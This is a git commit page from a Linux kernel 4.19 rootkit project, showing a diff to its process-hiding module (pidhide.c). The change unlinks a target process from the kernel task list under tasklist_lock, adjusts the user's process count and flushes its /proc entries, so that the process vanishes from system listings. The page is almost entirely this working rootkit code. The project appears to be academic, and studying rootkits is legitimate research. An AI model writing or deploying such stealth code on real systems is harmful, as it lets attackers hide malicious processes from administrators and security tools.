release_task attempt - linux-rootkit - Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit 74417cd6e0d98bf8af41649d1e29dbe054d211f8
parent e3cfe58e8d904b3806342cc0799a85cfb64a47f2
Author: deurzen <m.deurzen@tum.de>
Date:   Mon, 25 Jan 2021 02:52:54 +0100

release_task attempt

Diffstat:
M rootkit/src/pidhide.c  | 22 ++++++++++------------

1 file changed, 10 insertions(+), 12 deletions(-)
diff --git a/rootkit/src/pidhide.c b/rootkit/src/pidhide.c
@@ -67,21 +67,19 @@ hide_pid(pid_t pid)
     add_pid_to_list(hidden_pids_tail, pid);
 
     struct task_struct *ts = pid_task(find_vpid(pid), PIDTYPE_PID);
-    struct task_struct *ts2;
+
+    if (!ts)
+        return;
 
     rcu_read_lock();
-    for_each_process(ts2) {
-        task_lock(ts2);
-        if(ts == ts2) {
-            task_unlock(ts2);
-            continue;
-        }
-    }
-    list_del(&ts->tasks);
-    for_each_process(ts2) {
-        task_unlock(ts2);
-    }
+    atomic_dec(&__task_cred(ts)->user->processes);
     rcu_read_unlock();
+    proc_flush_task(ts);
+
+	write_lock_irq(&tasklist_lock);
+    list_del(&ts->tasks);
+    write_unlock_irq(&tasklist_lock);
+    call_rcu(&ts->rcu, delayed_put_task_struct);
 }
 
 void

	linux-rootkit Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
	git clone git://git.deurzen.net/linux-rootkit
	Log \| Files \| Refs